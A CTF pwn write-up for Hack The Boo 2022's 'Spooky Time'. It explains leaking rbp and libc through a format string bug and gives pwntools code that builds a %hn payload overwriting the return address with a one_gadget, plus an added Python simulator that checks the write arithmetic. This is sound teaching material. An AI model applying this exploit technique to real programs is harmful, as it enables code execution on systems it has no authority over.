# Hack The Boo 2022 / Spooky Time

###### tags: `CTF`,`PWN`,`writeup`

File link: http://gofile.me/6lhQ2/QZMezYgd6

![](https://i.imgur.com/8BJ1MfD.png)

![](https://i.imgur.com/wcFlSze.png)

There are two input points, both with a format string bug: one is used to leak, the other to write. With no usable gadgets and only a format string to work with, one_gadget is the obvious choice.

![](https://i.imgur.com/c3m0iMn.png)

First use `%49$p%53$p` to leak rbp and a libc address.

Then use `%hn` to write the libc offset (the one_gadget address) and rbp so that the one_gadget constraints are satisfied; r10 is already NULL, so it does not need to be written.

The payload was written quickly and is ugly.

```
from pwn import p64

# one_gadget and rbp come from the earlier %49$p%53$p leak (values not shown here)
one_gadget = one_gadget % 0x100000000          # only the low 32 bits of the return address are rewritten
a = (one_gadget//0x10000)                      # -> rbp+10 : bits 16-31 of the gadget address
b = (((one_gadget % 0x10000)-(one_gadget//0x10000)+0x10000) % 0x10000)   # -> rbp+8 : bits 0-15
c = ((rbp//0x100000000)-(one_gadget % 0x10000)+0x10000) % 0x10000        # -> rbp+4 : bits 32-47 of rbp
d = ((rbp//0x10000)-(rbp//0x100000000)+0x10000) % 0x10000                # -> rbp+2 : bits 16-31 of rbp
e = ((rbp % 0x10000)-((rbp % 0x100000000)//0x10000)+0x10000) % 0x10000   # -> rbp   : bits 0-15 of rbp
# each %Nc advances printf's character counter by N; each %K$hn stores the counter's low 16 bits
# at the address in positional argument K (note: a width of 0 still prints one character)
payload = b"%"+str(a).encode("UTF-8")+b"c%18$hn%"+str(b).encode("UTF-8")+b"c%19$hn%"+str(c).encode(
    "UTF-8")+b"c%20$hn%"+str(d).encode("UTF-8")+b"c%21$hn%"+str(e).encode("UTF-8")+b"c%22$hn"
# pad the format string to 80 bytes so the five addresses land at positional args 18..22
payload = payload.ljust(80, b"\x00")+p64(rbp+10) + \
    p64(rbp+8)+p64(rbp+4)+p64(rbp+2)+p64(rbp)
```
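As an added example (not part of the original write-up), the following Python model replays the `%Nc...%K$hn` chain with printf's real counter semantics on a fake stack, so the modular arithmetic above can be checked offline. It assumes the payload buffer starts at positional argument 8 (derived from byte offset 80 mapping to `%18$`), and the one_gadget / rbp values are constructed stand-ins, not the real leaks.

```python
import re
import struct

# Constructed sample values, not leaks from the real target.
ONE_GADGET = 0x7f3c1a2e4c3f   # stands in for the leaked libc one_gadget address
RBP = 0x7ffd3f8e9c50          # stands in for the leaked rbp
BUF_ARG = 8                   # assumption: payload buffer sits at positional arg 8 (offset 80 -> %18$)

def build_hn_payload(one_gadget, rbp):
    """Same arithmetic as the write-up: five %hn writes whose widths are the
    successive differences (mod 0x10000) between the 16-bit target values."""
    og = one_gadget % 0x100000000
    a = og // 0x10000
    b = (og % 0x10000 - a) % 0x10000
    c = (rbp // 0x100000000 - og % 0x10000) % 0x10000
    d = (rbp // 0x10000 - rbp // 0x100000000) % 0x10000
    e = (rbp % 0x10000 - (rbp % 0x100000000) // 0x10000) % 0x10000
    fmt = b"".join(b"%%%dc%%%d$hn" % (w, k) for w, k in zip((a, b, c, d, e), range(18, 23)))
    addrs = (rbp + 10, rbp + 8, rbp + 4, rbp + 2, rbp)
    return fmt.ljust(80, b"\x00") + b"".join(struct.pack("<Q", x) for x in addrs)

def simulate(payload):
    """Walk the format string the way printf does: %Nc emits max(N, 1) characters
    (%0c still prints one) and %K$hn stores the running count's low 16 bits at
    the address held in positional argument K. Returns {address: 16-bit word}."""
    def arg(k):
        off = (k - BUF_ARG) * 8
        return struct.unpack("<Q", payload[off:off + 8])[0]
    mem, count = {}, 0
    for width, k in re.findall(rb"%(\d+)c%(\d+)\$hn", payload.split(b"\x00")[0]):
        count += max(int(width), 1)
        mem[arg(int(k))] = count & 0xffff
    return mem

def read_qword(mem, base, original):
    """Overlay the 16-bit writes that fall inside the qword at base."""
    val = original
    for addr, word in mem.items():
        shift = (addr - base) * 8
        if 0 <= shift < 64:
            val = (val & ~(0xffff << shift)) | (word << shift)
    return val

def apply_payload(one_gadget, rbp, saved_rbp, saved_ret):
    """Return (saved rbp, return address) as they look after the five writes."""
    mem = simulate(build_hn_payload(one_gadget, rbp))
    return read_qword(mem, rbp, saved_rbp), read_qword(mem, rbp + 8, saved_ret)

if __name__ == "__main__":
    print([hex(v) for v in apply_payload(ONE_GADGET, RBP, 0x7ffd3f8e9d10, 0x7f3c1a2b1234)])
```

The saved return address ends up as ONE_GADGET only because both share the same top 16 bits (same libc mapping), which is why the write-up can get away with rewriting just the low 32 bits.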